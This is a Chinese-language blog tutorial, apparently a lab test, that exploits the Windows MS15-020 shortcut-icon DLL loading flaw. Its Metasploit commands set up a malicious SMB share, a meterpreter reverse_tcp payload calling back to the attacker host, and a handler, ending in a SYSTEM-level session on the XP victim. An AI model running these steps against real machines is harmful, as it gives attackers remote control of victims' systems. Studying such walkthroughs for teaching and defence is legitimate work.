Windows漏洞MS15-020测试

了解:

Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,

成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。

事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。

实验环境:

共享主机win7192.168.1.3 

入侵主机linux192.168.1.7

受害者主机XP192.168.10

打开终端输入命令:

msfconsole    //启动msf(metasploit framework)
search ms15  //搜索关键字相关漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  //漏洞利用模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp     //设置一个反弹shell
图片[1]-Windows漏洞MS15-020测试-铭心博客

设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.3  //我设置为我的另一台主机地址 就是你开着共享那台机器的地址
set UNCSHARE share       //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提前创建好共享
set LHOST 192.168.1.7   //设置漏洞成功利用后后门连接的地址
exploit  //执行漏洞
图片[2]-Windows漏洞MS15-020测试-铭心博客

exploit后会发现生成了几个文件,

去生成的目录下把文件拷贝到共享主机的共享文件夹下

图片[3]-Windows漏洞MS15-020测试-铭心博客

复制到共享主机后,在启动MSF进行配置刚才的后门进行监听…输入命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.7
exploit
图片[4]-Windows漏洞MS15-020测试-铭心博客

受害者访问共享后,

成功了触发了漏洞

图片[5]-Windows漏洞MS15-020测试-铭心博客

可以发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里顺便提了下权,可以看见system权限。

© 版权声明
THE END
喜欢就支持一下吧!
点赞125 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容